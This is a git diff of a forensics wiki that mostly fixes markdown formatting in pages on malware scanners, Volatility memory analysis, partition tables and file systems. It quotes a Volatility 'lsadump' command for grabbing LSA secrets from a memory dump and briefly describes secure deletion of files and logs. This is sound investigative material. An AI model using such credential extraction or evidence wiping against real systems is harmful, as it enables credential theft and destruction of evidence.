+****You can use tools such as **** [**Redline**](https://www.fireeye.com/services/freeware/redline.html) **** to **search for defined IOCs in a device**.
 
 ### Loki
 
-****[**Loki**](https://github.com/Neo23x0/Loki)** **is a scanner for Simple Indicators of Compromise.\
+****[**Loki**](https://github.com/Neo23x0/Loki) **** is a scanner for Simple Indicators of Compromise.\
 Detection is based on four detection methods:
 
 ```
@@ -97,7 +97,7 @@ Detection is based on four detection methods:
 
 ### rkhunter
 
-Tools like [**rkhunter**](http://rkhunter.sourceforge.net) can be used to check the filesystem for possible **rootkits **and malware.
+Tools like [**rkhunter**](http://rkhunter.sourceforge.net) can be used to check the filesystem for possible **rootkits** and malware.
 
 ```bash
 sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress]
@@ -107,13 +107,13 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk
 
 [PEpper ](https://github.com/Th3Hurrican3/PEpper)checks some basic stuff inside the executable (binary data, entropy, URLs and IPs, some yara rules).
 
-### NeoPI 
+### NeoPI&#x20;
 
-****[**NeoPI **](https://github.com/CiscoCXSecurity/NeoPI)is a Python script that uses a variety of **statistical methods **to detect **obfuscated **and **encrypted **content within text/script files. The intended purpose of NeoPI is to aid in the **detection of hidden web shell code**.
+****[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI)is a Python script that uses a variety of **statistical methods** to detect **obfuscated** and **encrypted** content within text/script files. The intended purpose of NeoPI is to aid in the **detection of hidden web shell code**.
 
 ### **php-malware-finder**
 
-****[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) does its very best to detect **obfuscated**/**dodgy code **as well as files using **PHP **functions often used in **malwares**/webshells.
+****[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) does its very best to detect **obfuscated**/**dodgy code** as well as files using **PHP** functions often used in **malwares**/webshells.
 
 ### Apple Binary Signatures
 
@@ -134,12 +134,12 @@ spctl --assess --verbose /Applications/Safari.app
 
 ### File Stacking
 
-If you know that some folder containing the **files **of a web server was** last updated in some date**. **Check **the **date **all the **files **in the **web server were created and modified** and if any date is **suspicious**, check that file.
+If you know that some folder containing the **files** of a web server was **last updated in some date**. **Check** the **date** all the **files** in the **web server were created and modified** and if any date is **suspicious**, check that file.
 
 ### Baselines
 
-If the files of a folder s**houldn't have been modified**, you can calculate the **hash **of the **original files **of the folder and **compare **them with the **current **ones. Anything modified will be **suspicious**.
+If the files of a folder s**houldn't have been modified**, you can calculate the **hash** of the **original files** of the folder and **compare** them with the **current** ones. Anything modified will be **suspicious**.
 
 ### Statistical Analysis
 
-When the information is saved in logs you can** check statistics like how many times each file of a web server was accessed as a webshell might be one of the most**.
+When the information is saved in logs you can **check statistics like how many times each file of a web server was accessed as a webshell might be one of the most**.
diff --git a/forensics/basic-forensic-methodology/memory-dump-analysis/README.md b/forensics/basic-forensic-methodology/memory-dump-analysis/README.md
index 698ebe6a..8ecf5356 100644
--- a/forensics/basic-forensic-methodology/memory-dump-analysis/README.md
+++ b/forensics/basic-forensic-methodology/memory-dump-analysis/README.md
@@ -1,6 +1,6 @@
 # Memory dump analysis
 
-Start **searching **for **malware **inside the pcap. Use the **tools **mentioned in [**Malware Analysis**](../malware-analysis.md).
+Start **searching** for **malware** inside the pcap. Use the **tools** mentioned in [**Malware Analysis**](../malware-analysis.md).
 
 ## [Volatility](volatility-examples.md)
 
@@ -25,7 +25,7 @@ You can also load the exception and see the decompiled instructions
 
 Anyway Visual Studio isn't the best tool to perform a analysis in depth of the dump.
 
-You should **open **it using **IDA **or **Radare **to inspection it in **depth**.
+You should **open** it using **IDA** or **Radare** to inspection it in **depth**.
 
 
 
diff --git a/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md b/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md
index 82045898..0dbc4bb4 100644
--- a/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md
+++ b/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md
@@ -1,6 +1,6 @@
 # Volatility - CheatSheet
 
-If you want something **fast and crazy **that will launch several Volatility plugins on parallel you can use: [https://github.com/carlospolop/autoVolatility](https://github.com/carlospolop/autoVolatility)
+If you want something **fast and crazy** that will launch several Volatility plugins on parallel you can use: [https://github.com/carlospolop/autoVolatility](https://github.com/carlospolop/autoVolatility)
 
 ```bash
 python autoVolatility.py -f MEMFILE -d OUT_DIRECTORY -e /home/user/tools/volatility/vol.py # Will use most important plugins (could use a lot of space depending on the size of the memory)
@@ -54,7 +54,7 @@ From: [http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis
 ### Volatility3
 
 As explained inside the readme you need to put the **symbol table of the OS** you want to support inside _volatility3/volatility/symbols_.\
-Symbol table packs for the various operating systems are available for **download **at:
+Symbol table packs for the various operating systems are available for **download** at:
 
 * [https://downloads.volatilityfoundation.org/volatility3/symbols/windows.zip](https://downloads.volatilityfoundation.org/volatility3/symbols/windows.zip)
 * [https://downloads.volatilityfoundation.org/volatility3/symbols/mac.zip](https://downloads.volatilityfoundation.org/volatility3/symbols/mac.zip)
@@ -101,9 +101,9 @@ volatility kdbgscan -f file.dmp
 
 #### **Differences between imageinfo and kdbgscan**
 
-As opposed to imageinfo which simply provides profile suggestions, **kdbgscan **is designed to positively identify the correct profile and the correct KDBG address (if there happen to be multiple). This plugin scans for the KDBGHeader signatures linked to Volatility profiles and applies sanity checks to reduce false positives. The verbosity of the output and number of sanity checks that can be performed depends on whether Volatility can find a DTB, so if you already know the correct profile (or if you have a profile suggestion from imageinfo), then make sure you use it (from [here](https://www.andreafortuna.org/2017/06/25/volatility-my-own-cheatsheet-part-1-image-identification/)).
+As opposed to imageinfo which simply provides profile suggestions, **kdbgscan** is designed to positively identify the correct profile and the correct KDBG address (if there happen to be multiple). This plugin scans for the KDBGHeader signatures linked to Volatility profiles and applies sanity checks to reduce false positives. The verbosity of the output and number of sanity checks that can be performed depends on whether Volatility can find a DTB, so if you already know the correct profile (or if you have a profile suggestion from imageinfo), then make sure you use it (from [here](https://www.andreafortuna.org/2017/06/25/volatility-my-own-cheatsheet-part-1-image-identification/)).
 
-Always take a look in the** number of procceses that kdbgscan has found**. Sometimes imageinfo and kdbgscan can find **more than one** suitable **profile **but only the **valid one will have some process related** (This is because in order to extract processes the correct KDBG address is needed)
+Always take a look in the **number of procceses that kdbgscan has found**. Sometimes imageinfo and kdbgscan can find **more than one** suitable **profile** but only the **valid one will have some process related** (This is because in order to extract processes the correct KDBG address is needed)
 
 ```bash
 # GOOD
@@ -119,7 +119,7 @@ PsLoadedModuleList            : 0xfffff80001197ac0 (0 modules)
 
 #### KDBG
 
-The **kernel debugger block** (named KdDebuggerDataBlock of the type \_KDDEBUGGER\_DATA64, or **KDBG **by volatility) is important for many things that Volatility and debuggers do. For example, it has a reference to the PsActiveProcessHead which is the list head of all processes required for process listing.
+The **kernel debugger block** (named KdDebuggerDataBlock of the type \_KDDEBUGGER\_DATA64, or **KDBG** by volatility) is important for many things that Volatility and debuggers do. For example, it has a reference to the PsActiveProcessHead which is the list head of all processes required for process listing.
 
 ## OS Information
 
@@ -128,7 +128,7 @@ The **kernel debugger block** (named KdDebuggerDataBlock of the type \_KDDEBUGGE
 ./vol.py -f file.dmp windows.info.Info
 ```
 
-The plugin `banners.Banners` can be used in** vol3 to try to find linux banners** in the dump.
+The plugin `banners.Banners` can be used in **vol3 to try to find linux banners** in the dump.
 
 ## Hashes/Passwords
 
@@ -154,7 +154,7 @@ volatility --profile=Win7SP1x86_23418 lsadump -f file.dmp #Grab lsa secrets
 
 ## Memory Dump
 
-The memory dump of a process will **extract everything** of the current status of the process. The **procdump **module will only **extract **the **code**.
+The memory dump of a process will **extract everything** of the current status of the process. The **procdump** module will only **extract** the **code**.
 
 ```
 volatility -f file.dmp --profile=Win7SP1x86 memdump -p 2168 -D conhost/
@@ -165,7 +165,7 @@ volatility -f file.dmp --profile=Win7SP1x86 memdump -p 2168 -D conhost/
 ### List processes
 
 Try to find **suspicious** processes (by name) or **unexpected** child **processes** (for example a cmd.exe as a child of iexplorer.exe).\
-It could be interesting to **compare **the result of pslist with the one of psscan to identify hidden processes.
+It could be interesting to **compare** the result of pslist with the one of psscan to identify hidden processes.
 
 {% tabs %}
 {% tab title="vol3" %}
@@ -221,7 +221,7 @@ volatility --profile=PROFILE consoles -f file.dmp #command history by scanning f
 {% endtab %}
 {% endtabs %}
 
-Commands entered into cmd.exe are processed by **conhost.exe** (csrss.exe prior to Windows 7). So even if an attacker managed to **kill the cmd.exe** **prior **to us obtaining a memory **dump**, there is still a good chance of **recovering history **of the command line session from **conhost.exe’s memory**. If you find **something weird **(using the consoles modules), try to **dump **the **memory **of the **conhost.exe associated** process and **search **for **strings **inside it to extract the command lines.
+Commands entered into cmd.exe are processed by **conhost.exe** (csrss.exe prior to Windows 7). So even if an attacker managed to **kill the cmd.exe** **prior** to us obtaining a memory **dump**, there is still a good chance of **recovering history** of the command line session from **conhost.exe’s memory**. If you find **something weird** (using the consoles modules), try to **dump** the **memory** of the **conhost.exe associated** process and **search** for **strings** inside it to extract the command lines.
 
 ### Environment
 
@@ -537,7 +537,7 @@ volatility --profile=Win7SP1x86_23418 mftparser -f file.dmp
 {% endtab %}
 {% endtabs %}
 
-The NTFS file system contains a file called the _master file table_, or MFT. There is at least one entry in the MFT for every file on an NTFS file system volume, including the MFT itself.** All information about a file, including its size, time and date stamps, permissions, and data content**, is stored either in MFT entries, or in space outside the MFT that is described by MFT entries. From [here](https://docs.microsoft.com/en-us/windows/win32/fileio/master-file-table).
+The NTFS file system contains a file called the _master file table_, or MFT. There is at least one entry in the MFT for every file on an NTFS file system volume, including the MFT itself. **All information about a file, including its size, time and date stamps, permissions, and data content**, is stored either in MFT entries, or in space outside the MFT that is described by MFT entries. From [here](https://docs.microsoft.com/en-us/windows/win32/fileio/master-file-table).
 
 ### SSL Keys/Certs
 
@@ -599,7 +599,7 @@ volatility --profile=SomeLinux -f file.dmp linux_keyboard_notifiers #Keyloggers
 ### Scanning with yara
 
 Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
-Create the _**rules **_directory and execute it. This will create a file called _**malware\_rules.yar**_ which contains all the yara rules for malware.
+Create the _**rules**_ directory and execute it. This will create a file called _**malware\_rules.yar**_ which contains all the yara rules for malware.
 
 {% tabs %}
 {% tab title="vol3" %}
diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md
index 7314cb42..05fe07dd 100644
--- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md
+++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md
@@ -2,13 +2,13 @@
 
 ## Partitions
 
-A hard drive or a** SSD disk can contain different partitions** with the goal of separating data physically.\
+A hard drive or a **SSD disk can contain different partitions** with the goal of separating data physically.\
 The **minimum** unit of a disk is the **sector** (normally composed by 512B). So, each partition size needs to be multiple of that size.
 
 ### MBR (master Boot Record)
 
-It's allocated in the** first sector of the disk after the 446B of the boot code**. This sector is essential to indicate the PC what and from where a partition should be mounted.\
-It allows up to **4 partitions** (at most **just 1** can be active/**bootable**). However, if you need more partitions you can use **extended partitions**.. The** final byte** of this first sector is the boot record signature **0x55AA**. Only one partition can be marked as active.\
+It's allocated in the **first sector of the disk after the 446B of the boot code**. This sector is essential to indicate the PC what and from where a partition should be mounted.\
+It allows up to **4 partitions** (at most **just 1** can be active/**bootable**). However, if you need more partitions you can use **extended partitions**.. The **final byte** of this first sector is the boot record signature **0x55AA**. Only one partition can be marked as active.\
 MBR allows **max 2.2TB**.
 
 ![](<../../../.gitbook/assets/image (489).png>)
@@ -60,11 +60,11 @@ mount -o ro,loop,offset=32256,noatime /path/to/image.dd /media/part/
 
 #### LBA (Logical block addressing)
 
-**Logical block addressing** (**LBA**) is a common scheme used for **specifying the location of blocks **of data stored on computer storage devices, generally secondary storage systems such as hard disk drives. LBA is a particularly simple linear addressing scheme; **blocks are located by an integer index**, with the first block being LBA 0, the second LBA 1, and so on.
+**Logical block addressing** (**LBA**) is a common scheme used for **specifying the location of blocks** of data stored on computer storage devices, generally secondary storage systems such as hard disk drives. LBA is a particularly simple linear addressing scheme; **blocks are located by an integer index**, with the first block being LBA 0, the second LBA 1, and so on.
 
 ### GPT (GUID Partition Table)
 
-It’s called GUID Partition Table because every partition on your drive has a** globally unique identifier**.
+It’s called GUID Partition Table because every partition on your drive has a **globally unique identifier**.
 
 Just like MBR it starts in the **sector 0**. The MBR occupies 32bits while **GPT** uses **64bits**.\
 GPT **allows up to 128 partitions** in Windows and up to **9.4ZB**.\
@@ -82,55 +82,55 @@ For limited backward compatibility, the space of the legacy MBR is still reserve
 
 #### Hybrid MBR (LBA 0 + GPT)
 
-In operating systems that support **GPT-based boot through BIOS **services rather than EFI, the first sector may also still be used to store the first stage of the **bootloader** code, but **modified** to recognize **GPT** **partitions**. The bootloader in the MBR must not assume a sector size of 512 bytes.
+In operating systems that support **GPT-based boot through BIOS** services rather than EFI, the first sector may also still be used to store the first stage of the **bootloader** code, but **modified** to recognize **GPT** **partitions**. The bootloader in the MBR must not assume a sector size of 512 bytes.
 
 #### Partition table header (LBA 1)
 
 The partition table header defines the usable blocks on the disk. It also defines the number and size of the partition entries that make up the partition table (offsets 80 and 84 in the table).
 
-| Offset    | Length   | Contents                                                                                                                                                                     |
-| --------- | -------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| 0 (0x00)  | 8 bytes  | Signature ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h or 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID_Partition_Table#cite_note-8)on little-endian machines) |
-| 8 (0x08)  | 4 bytes  | Revision 1.0 (00h 00h 01h 00h) for UEFI 2.8                                                                                                                                  |
-| 12 (0x0C) | 4 bytes  | Header size in little endian (in bytes, usually 5Ch 00h 00h 00h or 92 bytes)                                                                                                 |
-| 16 (0x10) | 4 bytes  | [CRC32](https://en.wikipedia.org/wiki/CRC32) of header (offset +0 up to header size) in little endian, with this field zeroed during calculation                             |
-| 20 (0x14) | 4 bytes  | Reserved; must be zero                                                                                                                                                       |
-| 24 (0x18) | 8 bytes  | Current LBA (location of this header copy)                                                                                                                                   |
-| 32 (0x20) | 8 bytes  | Backup LBA (location of the other header copy)                                                                                                                               |
-| 40 (0x28) | 8 bytes  | First usable LBA for partitions (primary partition table last LBA + 1)                                                                                                       |
-| 48 (0x30) | 8 bytes  | Last usable LBA (secondary partition table first LBA − 1)                                                                                                                    |
-| 56 (0x38) | 16 bytes | Disk GUID in mixed endian                                                                                                                                                    |
-| 72 (0x48) | 8 bytes  | Starting LBA of array of partition entries (always 2 in primary copy)                                                                                                        |
-| 80 (0x50) | 4 bytes  | Number of partition entries in array                                                                                                                                         |
-| 84 (0x54) | 4 bytes  | Size of a single partition entry (usually 80h or 128)                                                                                                                        |
-| 88 (0x58) | 4 bytes  | CRC32 of partition entries array in little endian                                                                                                                            |
-| 92 (0x5C) | \*       | Reserved; must be zeroes for the rest of the block (420 bytes for a sector size of 512 bytes; but can be more with larger sector sizes)                                      |
+| Offset    | Length   | Contents                                                                                                                                                                        |
+| --------- | -------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
+| 0 (0x00)  | 8 bytes  | Signature ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h or 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#cite\_note-8)on little-endian machines) |
+| 8 (0x08)  | 4 bytes  | Revision 1.0 (00h 00h 01h 00h) for UEFI 2.8                                                                                                                                     |
+| 12 (0x0C) | 4 bytes  | Header size in little endian (in bytes, usually 5Ch 00h 00h 00h or 92 bytes)                                                                                                    |
+| 16 (0x10) | 4 bytes  | [CRC32](https://en.wikipedia.org/wiki/CRC32) of header (offset +0 up to header size) in little endian, with this field zeroed during calculation                                |
+| 20 (0x14) | 4 bytes  | Reserved; must be zero                                                                                                                                                          |
+| 24 (0x18) | 8 bytes  | Current LBA (location of this header copy)                                                                                                                                      |
+| 32 (0x20) | 8 bytes  | Backup LBA (location of the other header copy)                                                                                                                                  |
+| 40 (0x28) | 8 bytes  | First usable LBA for partitions (primary partition table last LBA + 1)                                                                                                          |
+| 48 (0x30) | 8 bytes  | Last usable LBA (secondary partition table first LBA − 1)                                                                                                                       |
+| 56 (0x38) | 16 bytes | Disk GUID in mixed endian                                                                                                                                                       |
+| 72 (0x48) | 8 bytes  | Starting LBA of array of partition entries (always 2 in primary copy)                                                                                                           |
+| 80 (0x50) | 4 bytes  | Number of partition entries in array                                                                                                                                            |
+| 84 (0x54) | 4 bytes  | Size of a single partition entry (usually 80h or 128)                                                                                                                           |
+| 88 (0x58) | 4 bytes  | CRC32 of partition entries array in little endian                                                                                                                               |
+| 92 (0x5C) | \*       | Reserved; must be zeroes for the rest of the block (420 bytes for a sector size of 512 bytes; but can be more with larger sector sizes)                                         |
 
 #### Partition entries (LBA 2–33)
 
-| GUID partition entry format |          |                                                                                                               |
-| --------------------------- | -------- | ------------------------------------------------------------------------------------------------------------- |
-| Offset                      | Length   | Contents                                                                                                      |
-| 0 (0x00)                    | 16 bytes | [Partition type GUID](https://en.wikipedia.org/wiki/GUID_Partition_Table#Partition_type_GUIDs) (mixed endian) |
-| 16 (0x10)                   | 16 bytes | Unique partition GUID (mixed endian)                                                                          |
-| 32 (0x20)                   | 8 bytes  | First LBA ([little endian](https://en.wikipedia.org/wiki/Little_endian))                                      |
-| 40 (0x28)                   | 8 bytes  | Last LBA (inclusive, usually odd)                                                                             |
-| 48 (0x30)                   | 8 bytes  | Attribute flags (e.g. bit 60 denotes read-only)                                                               |
-| 56 (0x38)                   | 72 bytes | Partition name (36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE code units)                               |
+| GUID partition entry format |          |                                                                                                                   |
+| --------------------------- | -------- | ----------------------------------------------------------------------------------------------------------------- |
+| Offset                      | Length   | Contents                                                                                                          |
+| 0 (0x00)                    | 16 bytes | [Partition type GUID](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#Partition\_type\_GUIDs) (mixed endian) |
+| 16 (0x10)                   | 16 bytes | Unique partition GUID (mixed endian)                                                                              |
+| 32 (0x20)                   | 8 bytes  | First LBA ([little endian](https://en.wikipedia.org/wiki/Little\_endian))                                         |
+| 40 (0x28)                   | 8 bytes  | Last LBA (inclusive, usually odd)                                                                                 |
+| 48 (0x30)                   | 8 bytes  | Attribute flags (e.g. bit 60 denotes read-only)                                                                   |
+| 56 (0x38)                   | 72 bytes | Partition name (36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE code units)                                   |
 
 #### Partitions Types
 
 ![](<../../../.gitbook/assets/image (492).png>)
 
-More partition types in [https://en.wikipedia.org/wiki/GUID_Partition_Table](https://en.wikipedia.org/wiki/GUID_Partition_Table)
+More partition types in [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table)
 
 ### Inspecting
 
-After mounting the forensics image with [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/), you can inspect the first sector using the Windows tool [**Active Disk Editor**](https://www.disk-editor.org/index.html)**. **In the following image a **MBR** was detected on the **sector 0** and interpreted:
+After mounting the forensics image with [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/), you can inspect the first sector using the Windows tool [**Active Disk Editor**](https://www.disk-editor.org/index.html)**.** In the following image a **MBR** was detected on the **sector 0** and interpreted:
 
 ![](<../../../.gitbook/assets/image (494).png>)
 
-If it was a **GPT table instead of a MBR** it should appear the signature _EFI PART_ in the** sector 1 **(which in the previous image is empty).
+If it was a **GPT table instead of a MBR** it should appear the signature _EFI PART_ in the **sector 1** (which in the previous image is empty).
 
 ## File-Systems
 
@@ -144,13 +144,13 @@ If it was a **GPT table instead of a MBR** it should appear the signature _EFI P
 
 ### FAT
 
-The** FAT (File Allocation Table) **file system is named for its method of organization, the file allocation table, which resides at the beginning of the volume. To protect the volume, **two copies** of the table are kept, in case one becomes damaged. In addition, the file allocation tables and the root folder must be stored in a **fixed location** so that the files needed to start the system can be correctly located.
+The **FAT (File Allocation Table)** file system is named for its method of organization, the file allocation table, which resides at the beginning of the volume. To protect the volume, **two copies** of the table are kept, in case one becomes damaged. In addition, the file allocation tables and the root folder must be stored in a **fixed location** so that the files needed to start the system can be correctly located.
 
 ![](<../../../.gitbook/assets/image (495).png>)
 
 The minimum space unit used by this file-system is a **cluster, typically 512B** (which is composed by a number of sectors).
 
-The earlier **FAT12** had a **cluster addresses to 12-bit** values with up to **4078** **clusters**; it allowed up to 4084 clusters with UNIX. The more efficient **FAT16** increased to **16-bit** cluster address allowing up to** 65,517 clusters** per volume. FAT32 uses 32-bit cluster address allowing up to** 268,435,456 clusters** per volume
+The earlier **FAT12** had a **cluster addresses to 12-bit** values with up to **4078** **clusters**; it allowed up to 4084 clusters with UNIX. The more efficient **FAT16** increased to **16-bit** cluster address allowing up to **65,517 clusters** per volume. FAT32 uses 32-bit cluster address allowing up to **268,435,456 clusters** per volume
 
 The **maximum file-size allowed by FAT is 4GB** (minus one byte) because the file system uses a 32-bit field to store the file size in bytes, and 2^32 bytes = 4 GiB. This happens for FAT12, FAT16 and FAT32.
 
@@ -164,7 +164,7 @@ The **root directory** occupies a **specific position** for both FAT12 and FAT16
 * Address of the FAT table where the first cluster of the file starts
 * Size
 
-When a file is "deleted" using a FAT file system, the directory entry remains almost **unchanged** except for the **first character of the file name** (modified to** **0xE5), preserving most of the "deleted" file's name, along with its time stamp, file length and — most importantly — its physical location on the disk. The list of disk clusters occupied by the file will, however, be erased from the File Allocation Table, marking those sectors available for use by other files created or modified thereafter. In case of FAT32, it is additionally erased field responsible for upper 16 bits of file start cluster value.
+When a file is "deleted" using a FAT file system, the directory entry remains almost **unchanged** except for the **first character of the file name** (modified to **** 0xE5), preserving most of the "deleted" file's name, along with its time stamp, file length and — most importantly — its physical location on the disk. The list of disk clusters occupied by the file will, however, be erased from the File Allocation Table, marking those sectors available for use by other files created or modified thereafter. In case of FAT32, it is additionally erased field responsible for upper 16 bits of file start cluster value.
 
 ### **NTFS**
 
@@ -174,7 +174,7 @@ When a file is "deleted" using a FAT file system, the directory entry remains al
 
 ### EXT
 
-**Ext2 **is the most common file-system for **not journaling **partitions (**partitions that don't change much**) like the boot partition. **Ext3/4** are **journaling **and are used usually for the **rest partitions**.
+**Ext2** is the most common file-system for **not journaling** partitions (**partitions that don't change much**) like the boot partition. **Ext3/4** are **journaling** and are used usually for the **rest partitions**.
 
 {% content-ref url="ext.md" %}
 [ext.md](ext.md)
@@ -212,7 +212,7 @@ Also, the OS usually saves a lot of information about file system changes and ba
 
 Note that this technique **doesn't work to retrieve fragmented files**. If a file **isn't stored in contiguous sectors**, then this technique won't be able to find it or at least part of it.
 
-There are several tools that you can use for file Carving indicating them the file-types you want search for 
+There are several tools that you can use for file Carving indicating them the file-types you want search for&#x20;
 
 {% content-ref url="file-data-carving-recovery-tools.md" %}
 [file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md)
@@ -229,12 +229,12 @@ For example, instead of looking for a complete file containing logged URLs, this
 
 ### Secure Deletion
 
-Obviously, there are ways to **"securely" delete files and part of logs about them**. For example, it's possible to **overwrite the content **of a file with junk data several times, and then **remove** the **logs** from the** $MFT **and **$LOGFILE** about the file, and **remove the Volume Shadow Copies**. \
+Obviously, there are ways to **"securely" delete files and part of logs about them**. For example, it's possible to **overwrite the content** of a file with junk data several times, and then **remove** the **logs** from the **$MFT** and **$LOGFILE** about the file, and **remove the Volume Shadow Copies**. \
 You may notice that even performing that action there might be **other parts where the existence of the file is still logged**, and that's true and part of the forensics professional job is to find them.
 
 ## References
 
-* [https://en.wikipedia.org/wiki/GUID_Partition_Table](https://en.wikipedia.org/wiki/GUID_Partition_Table)
+* [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table)
 * [http://ntfs.com/ntfs-permissions.htm](http://ntfs.com/ntfs-permissions.htm)
 * [https://www.osforensics.com/faqs-and-tutorials/how-to-scan-ntfs-i30-entries-deleted-files.html](https://www.osforensics.com/faqs-and-tutorials/how-to-scan-ntfs-i30-entries-deleted-files.html)
 * [https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service](https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service)
diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md
index ee55c278..9d77748e 100644
--- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md
+++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md
@@ -2,7 +2,7 @@
 
 ## Ext - Extended Filesystem
 
-**Ext2 **is the most common filesystem for **not journaling **partitions (**partitions that don't change much**) like the boot partition. **Ext3/4** are **journaling **and are used usually for the **rest partitions**.
+**Ext2** is the most common filesystem for **not journaling** partitions (**partitions that don't change much**) like the boot partition. **Ext3/4** are **journaling** and are used usually for the **rest partitions**.
 
 All block groups in the filesystem have the same size and are stored sequentially. This allows the kernel to easily derive the location of a block group in a disk from its integer index.
 
@@ -19,7 +19,7 @@ Every block group contains the following pieces of information:
 
 ### Ext Optional Features
 
-**Features affect where **the data is located, **how **the data is stored in inodes and some of them might supply **additional metadata **for analysis, therefore features are important in Ext.
+**Features affect where** the data is located, **how** the data is stored in inodes and some of them might supply **additional metadata** for analysis, therefore features are important in Ext.
 
 Ext has optional features that your OS may or may not support, there are 3 possibilities:
 
@@ -27,13 +27,13 @@ Ext has optional features that your OS may or may not support, there are 3 possi
 * Incompatible
 * Compatible Read Only: It can be mounted but not for writing
 
-If there are **incompatible **features you won't be able to mount the filesystem as the OS won't know how the access the data.
+If there are **incompatible** features you won't be able to mount the filesystem as the OS won't know how the access the data.
 
 {% hint style="info" %}
 Suspected attacker might have non-standard extensions
 {% endhint %}
 
-**Any utility **that reads the **superblock **will be able to indicate the **features **of a **Ext filesystem**, but you could also use `file -sL /dev/sd*`
+**Any utility** that reads the **superblock** will be able to indicate the **features** of a **Ext filesystem**, but you could also use `file -sL /dev/sd*`
 
 ### Superblock
 
@@ -59,16 +59,16 @@ fsstat -o <offsetstart> /pat/to/filesystem-file.ext
 ```
 
 You can also use the free gui application: [https://www.disk-editor.org/index.html](https://www.disk-editor.org/index.html)\
-Or you can also use **python **to obtain the superblock information: [https://pypi.org/project/superblock/](https://pypi.org/project/superblock/)
+Or you can also use **python** to obtain the superblock information: [https://pypi.org/project/superblock/](https://pypi.org/project/superblock/)
 
 ### inodes
 
-The **inodes **contain the list of **blocks **that **contains **the actual **data **of a **file**.\
-If the file is big, and inode **may contain pointers **to **other inodes **that points to the blocks/more inodes containing the file data.
+The **inodes** contain the list of **blocks** that **contains** the actual **data** of a **file**.\
+If the file is big, and inode **may contain pointers** to **other inodes** that points to the blocks/more inodes containing the file data.
 
 ![](<../../../.gitbook/assets/image (416).png>)
 
-In **Ext2 **and **Ext3 **inodes are of size **128B**, **Ext4 **currently uses **156B **but allocates **256B **on disk to allow a future expansion.
+In **Ext2** and **Ext3** inodes are of size **128B**, **Ext4** currently uses **156B** but allocates **256B** on disk to allow a future expansion.
 
 Inode structure:
 
@@ -140,7 +140,7 @@ Knowing the inode number you can easily find it's index:
 
 * **Block group** where an inode belongs: (Inode number - 1) / (Inodes per group)
 * **Index inside it's group**: (Inode number - 1) mod(Inodes/groups)
-* **Offset **into **inode table**: Inode number \* (Inode size)
+* **Offset** into **inode table**: Inode number \* (Inode size)
 * The "-1" is because the inode 0 is undefined (not used)
 
 ```bash
@@ -190,7 +190,7 @@ Directories
 Can be stored in
 
 * Extra space between inodes (256 - inode size, usually = 100)
-* A data block pointed to by file_acl in inode
+* A data block pointed to by file\_acl in inode
 
 Can be used to store anything as a users attribute if name starts with "user".
 
@@ -216,7 +216,7 @@ getdattr -n 'user.secret' file.txt #Get extended attribute called "user.secret"
 
 ### Filesystem View
 
-In order to see the contents of the file system you can** use the free tool**: [https://www.disk-editor.org/index.html](https://www.disk-editor.org/index.html)\
+In order to see the contents of the file system you can **use the free tool**: [https://www.disk-editor.org/index.html](https://www.disk-editor.org/index.html)\
 Or you can mount it in your linux using `mount` command.
 
-[https://piazza.com/class_profile/get_resource/il71xfllx3l16f/inz4wsb2m0w2oz#:\~:text=The%20Ext2%20file%20system%20divides,lower%20average%20disk%20seek%20time.](https://piazza.com/class_profile/get_resource/il71xfllx3l16f/inz4wsb2m0w2oz#:\~:text=The%20Ext2%20file%20system%20divides,lower%20average%20disk%20seek%20time.)
+[https://piazza.com/class\_profile/get\_resource/il71xfllx3l16f/inz4wsb2m0w2oz#:\~:text=The%20Ext2%20file%20system%20divides,lower%20average%20disk%20seek%20time.](https://piazza.com/class\_profile/get\_resource/il71xfllx3l16f/inz4wsb2m0w2oz#:\~:text=The%20Ext2%20file%20system%20divides,lower%20average%20disk%20seek%20time.)
diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
index bf52c8c7..57b89739 100644
--- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
+++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
